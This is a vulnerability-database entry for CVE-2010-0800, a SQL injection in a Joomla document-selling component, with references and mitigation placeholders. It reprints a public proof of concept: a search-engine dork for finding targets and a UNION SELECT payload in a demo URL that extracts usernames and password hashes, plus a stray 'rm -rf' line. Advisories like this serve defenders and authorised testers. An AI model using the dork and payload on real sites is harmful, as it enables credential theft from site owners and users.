CVE-2010-0800
Description
SQL injection vulnerability in the Ossolution Team Documents Seller (aka DMS) (com_dms) component 2.5.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the category_id parameter in a view_category action to index.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component com_dms 2.5.1 - SQL Injection
/**************************************************************************
[~] Joomla Component com_dms Remote SQL injection vulnerability - (category_id)
[~] Author : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com
[~] Date : 28 January, 2010
**************************************************************************/
[ Software Information ]
[+] Vendor : http://joomdonation.com/
[+] Info : http://joomdonation.com/index.php?option=com_content&view=article&id=41&Itemid=40
[+] version : 2.5.1 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_dms"
[+] Type : commercial
===========================================================================
[ Vulnerable File ]
http://server/index.php?option=com_dms&task=view_category&category_id=[INDONESIANCODER]
[ Exploit ]
-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--
[ Demo ]
http://server/index.php?option=com_dms&task=view_category&category_id=-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--
===========================================================================
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
[ NOTE ]
[+] Babe enyak adek i love u pull dah ..
[+] Bercinta Sekuat Tenaga !
[+] rm -rf
[ QUOTE ]
[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..References
- http://osvdb.org/62040
- http://secunia.com/advisories/38410
- http://www.exploit-db.com/exploits/11289
- http://www.securityfocus.com/bid/38017
- http://www.securityfocus.com/bid/38024
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56006
- http://osvdb.org/62040
- http://secunia.com/advisories/38410
- http://www.exploit-db.com/exploits/11289
- http://www.securityfocus.com/bid/38017
- http://www.securityfocus.com/bid/38024
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56006
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.